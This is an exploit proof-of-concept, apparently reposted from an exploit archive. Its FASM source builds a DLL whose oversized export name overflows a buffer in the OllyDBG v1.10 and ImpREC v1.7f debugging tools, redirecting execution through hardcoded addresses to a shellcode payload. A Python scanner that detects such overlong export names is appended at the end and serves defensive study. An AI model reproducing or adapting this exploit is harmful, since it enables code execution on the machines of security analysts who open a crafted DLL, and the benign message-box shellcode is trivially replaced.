OllyDBG v1.10 and ImpREC v1.7f (export name) BOF PoC
====================================================
OllyDBG v1.10 and ImpREC v1.7f (export name) BOF PoC
====================================================

;-------------------------------------------------------------------------;
; OllyDBG v1.10 and ImpREC v1.7f export name buffer overflow vulnerability
; PoC (probably older versions affected too, not tested though.)
;
; Included shellcode shows a messagebox (WinXP SP2) and is configured for
; OllyDBG. See lines 60-105 for more details
;-------------------------------------------------------------------------;
; Usage:
; Load this DLL to your process and try to attach OllyDBG or ImpREC
; to it -> Shellcode executed >:)
;
; Shellcode gets fired also if program is run under OllyDBG.
;
; Bug discovered and PoC coded by:
; ~ Defsanguje, Defsanguje [at] gmail [dot] com [July 7 2008]
;-------------------------------------------------------------------------;
; Coded in FASM
;-------------------------------------------------------------------------;

format PE GUI 4.0 DLL
include 'win32a.inc'

entry DllEntryPoint

section '.code' code readable executable

proc DllEntryPoint, hinstDLL,fdwReason,lpvReserved
    mov eax, TRUE
    ret
endp

;-------------------------------------------------------------------------;
; Modified version from original export-macro.
;-------------------------------------------------------------------------;
macro ExportExploit dllname,[label]
{ common
    local module,addresses,names,ordinal,count
    count = 0
  forward
    count = count+1
  common
    dd 0,0,0,RVA module,1
    dd count,count,RVA addresses,RVA names,RVA ordinal
    addresses:
  forward
    dd RVA label
  common
    names:
  forward
    local name
    dd RVA name
  common
    ordinal: count = 0
  forward
    dw count
    count = count+1
  common
    module db dllname,0
  forward
;-------------------------------------------------------------------------;
; Exploit for OllyDBG v1.10
;-------------------------------------------------------------------------;
a:
    name\
    db 3e0h dup (90h)
    dd 6d553b78h          ; ESP to EBP
    dd 6d55e5ffh          ; EBP to EAX
    dd 0defdefdeh
    dd 0defdefdeh
    dd 6d56d25eh          ; add eax, 40h
    dd 0defdefdeh
    dd 6d52e1efh          ; jmp EAX =)
    db 40h-18h dup(90h)
c:
    push eax
    mov eax, (ShellCodeStart-c) xor 0defdefdeh
    xor eax, 0defdefdeh
    add eax, [esp]
    jmp eax
b:
    db 0bd0h - (ShellCodeEnd-ShellCodeStart) - (b-a) dup (90h)
ShellCodeStart:
    db 81h,0ECh,07Dh,0FFh,0FFh,0FFh
    db 2Bh,0C9h,51h,51h,51h,51h,51h,0BBh
    db 8Ah,05h,45h,7Eh    ; Address of messagebox in winxp sp2
    db 0FFh,0D3h
ShellCodeEnd:
    dd 0045F823h          ; New EIP
    db 300h dup(90h)
    db 0
;-------------------------------------------------------------------------;
; Exploit for ImpREC v1.7f
;-------------------------------------------------------------------------;
;    name\
;    db 0C0Ch - (ShellCodeEnd-ShellCodeStart) dup (90h)
;ShellCodeStart:
;    db 81h,0ECh,07Dh,0FFh,0FFh,0FFh
;    db 2Bh,0C9h,51h,51h,51h,51h,51h,0BBh
;    db 8Ah,05h,45h,7Eh    ; Address of messagebox in winxp sp2
;    db 0FFh,0D3h
;ShellCodeEnd:
;    dd 12c1b8h            ; New EIP
;    db 0
;-------------------------------------------------------------------------;
  common
    local x,y,z,str1,str2,v1,v2
    x = count shr 1
    while x > 0
     y = x
     while y < count
      z = y
      while z-x >= 0
       load v1 dword from names+z*4
       str1=($-RVA $)+v1
       load v2 dword from names+(z-x)*4
       str2=($-RVA $)+v2
       while v1 > 0
        load v1 from str1+%-1
        load v2 from str2+%-1
        if v1 <> v2
         break
        end if
       end while
       if v1<v2
        load v1 dword from names+z*4
        load v2 dword from names+(z-x)*4
        store dword v1 at names+(z-x)*4
        store dword v2 at names+z*4
        load v1 word from ordinal+z*2
        load v2 word from ordinal+(z-x)*2
        store word v1 at ordinal+(z-x)*2
        store word v2 at ordinal+z*2
       else
        break
       end if
       z = z-x
      end while
      y = y+1
     end while
     x = x shr 1
    end while }

section '.edata' export data readable

;-------------------------------------------------------------------------;
; Call the macro
;-------------------------------------------------------------------------;
ExportExploit 'exploit.dll',\
              $

;-------------------------------------------------------------------------;

# 0day.today [2024-11-15] #
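The check a defender would want against the trait this PoC relies on, added here as an example and not part of the original listing: a Python scanner that walks a PE file's export directory (the same structure the ExportExploit macro above emits) and reports export names longer than any legitimate symbol, so a DLL of this kind can be flagged before a debugger or import reconstructor is pointed at it. build_dll is a constructed fixture that produces a minimal PE32 for the scanner to read; the 256-byte limit is an assumption, and the 0xBD0-byte sample name mirrors the OllyDBG payload size above.

```python
import struct

def rva_to_off(sections, rva):
    """Map an RVA to a file offset using (VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData)."""
    for vsize, va, raw_size, raw_ptr in sections:
        if va <= rva < va + max(vsize, raw_size):
            return rva - va + raw_ptr
    raise ValueError("RVA 0x%x lies outside every section" % rva)

def long_export_names(data, limit=256):
    """Return [(first 16 chars, length)] for each export name longer than `limit` (assumed: 256).
    Legitimate symbols stay far below that; the PoC above uses a name of ~3 KiB. A name with no NUL is measured to EOF."""
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    if data[:2] != b"MZ" or data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    nsect, opt_size = struct.unpack_from("<H12xH", data, pe + 6)     # NumberOfSections, SizeOfOptionalHeader
    opt = pe + 24
    is_pe32 = struct.unpack_from("<H", data, opt)[0] == 0x10B        # otherwise PE32+
    exp_rva = struct.unpack_from("<I", data, opt + (96 if is_pe32 else 112))[0]
    if exp_rva == 0: return []                                      # no export directory at all
    sections = [struct.unpack_from("<IIII", data, opt + opt_size + 40 * i + 8) for i in range(nsect)]
    exp = rva_to_off(sections, exp_rva)
    n_names, names_rva = struct.unpack_from("<I4xI", data, exp + 24)  # NumberOfNames, AddressOfNames
    ptrs, hits = rva_to_off(sections, names_rva), []
    for i in range(n_names):
        off = rva_to_off(sections, struct.unpack_from("<I", data, ptrs + 4 * i)[0])
        end = data.find(b"\0", off)
        length = (len(data) if end < 0 else end) - off
        if length > limit:
            hits.append((data[off:off + 16].decode("latin-1"), length))
    return hits

def build_dll(names):
    """Constructed fixture: a minimal PE32 with one section carrying an export table (not a loadable DLL)."""
    va = off = 0x200                                # single section, RVA == file offset
    n, blob = len(names), bytearray(40)             # the 40-byte export directory comes first
    funcs = va + len(blob); blob += struct.pack("<%dI" % n, *([0x1000] * n))
    name_ptrs = va + len(blob); blob += bytes(4 * n)
    ords = va + len(blob); blob += struct.pack("<%dH" % n, *range(n))
    for i, nm in enumerate(names):
        struct.pack_into("<I", blob, name_ptrs - va + 4 * i, va + len(blob))
        blob += nm + b"\0"
    struct.pack_into("<8I", blob, 0, 0, 0, 0, 0, 1, n, n, funcs)   # ..., Base, NumberOfFunctions, NumberOfNames, AddressOfFunctions
    struct.pack_into("<II", blob, 32, name_ptrs, ords)             # AddressOfNames, AddressOfNameOrdinals
    hdr = bytearray(off); hdr[:2] = b"MZ"; struct.pack_into("<I", hdr, 0x3C, 0x40)
    hdr[0x40:0x44] = b"PE\0\0"; struct.pack_into("<HH", hdr, 0x44, 0x14C, 1)   # i386, one section
    struct.pack_into("<HH", hdr, 0x54, 224, 0x2102); struct.pack_into("<H", hdr, 0x58, 0x10B)
    struct.pack_into("<II", hdr, 0x58 + 96, va, len(blob))         # export data directory entry
    struct.pack_into("<IIII", hdr, 0x58 + 224 + 8, len(blob), va, len(blob), off)   # section header
    return bytes(hdr) + bytes(blob)
```

Run the scanner over a directory of DLLs and anything it reports deserves a look before being loaded into a debugger, since the tools named above read the name without a length check.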